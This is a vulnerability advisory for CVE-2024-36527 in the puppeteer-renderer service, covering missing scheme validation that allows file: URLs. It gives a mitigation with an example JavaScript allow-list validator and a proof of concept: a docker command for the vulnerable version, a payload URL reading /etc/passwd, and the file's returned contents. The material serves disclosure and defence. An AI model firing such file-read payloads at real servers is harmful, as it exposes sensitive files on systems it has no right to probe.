CVE ID: CVE-2024-36527
Description:
puppeteer-renderer is a service that can render web pages using Puppeteer. There is a vulnerability in this service where the url parameter is not validated to restrict it to only http or https protocols. This allows an attacker to use the file protocol to perform a path traversal attack.
Impact:
An attacker can exploit this vulnerability to read arbitrary files on the server, potentially gaining access to sensitive information.
Affected Versions:
puppeteer-renderer versions prior to 3.3.0.
Mitigation:
Users should update to version 3.3.0 or later where this issue has been addressed. Additionally, ensure that input validation is implemented to restrict the url parameter to only http and https protocols.
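The scheme allow-list the mitigation calls for, as an added example (this is not puppeteer-renderer's own code; the function names, the ALLOWED_PROTOCOLS set and the sample inputs are constructed for illustration). It parses the parameter with the WHATWG URL parser and accepts only http: and https:, and it is shown beside a naive substring check to make clear why the latter is not a fix: a file: URL can carry the string "http" in its query and still read a local file.

```javascript
// Added example: validate a user-supplied url parameter before handing it
// to a headless browser. Not puppeteer-renderer's code; names and sample
// inputs below are constructed for illustration.
const ALLOWED_PROTOCOLS = new Set(['http:', 'https:']);

// Returns the normalised URL string when the scheme is http(s), else null.
function validateRenderUrl(input) {
  if (typeof input !== 'string') return null;
  let parsed;
  try {
    parsed = new URL(input); // throws on relative paths and malformed input
  } catch {
    return null;
  }
  // The parser lowercases the scheme, so "FILE:" and "File:" are caught too.
  if (!ALLOWED_PROTOCOLS.has(parsed.protocol)) return null;
  return parsed.href;
}

// A substring check of the kind that is NOT sufficient: it only looks for
// the text "http" somewhere in the value, so a file: URL with "http" in its
// query string passes.
function naiveCheck(input) {
  return typeof input === 'string' && input.includes('http');
}

// Constructed sample inputs covering the accepted and rejected cases.
const SAMPLE_URLS = [
  'http://example.com/page',
  'https://example.com/page?next=file:///etc/passwd', // https scheme: allowed
  'file:///etc/passwd',
  'FILE:///etc/passwd',
  'file://localhost/etc/passwd?cb=http', // defeats the naive check
  'javascript:void(0)',
  '/etc/passwd', // relative path, not a URL at all
];

for (const sample of SAMPLE_URLS) {
  const strict = validateRenderUrl(sample) !== null;
  console.log(`${sample} -> allow-list: ${strict}, naive: ${naiveCheck(sample)}`);
}
```

Apply the check in the request handler before the URL reaches page.goto(), and reject with a 4xx rather than falling back to a default URL, so that rejected requests show up in access logs.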
Proof of Concept:
The following example demonstrates how an attacker can exploit this vulnerability:
- Start server using docker:
docker run -d --name renderer -p 8080:3000 ghcr.io/zenato/puppeteer-renderer:v3.2.0
- Payload:
http://localhost:8080/html?url=file:///etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
node:x:1000:1000::/home/node:/bin/bash
messagebus:x:100:102::/nonexistent:/usr/sbin/nologin
pptruser:x:999:999::/home/pptruser:/bin/sh
References:
Reported by:
Zac Wang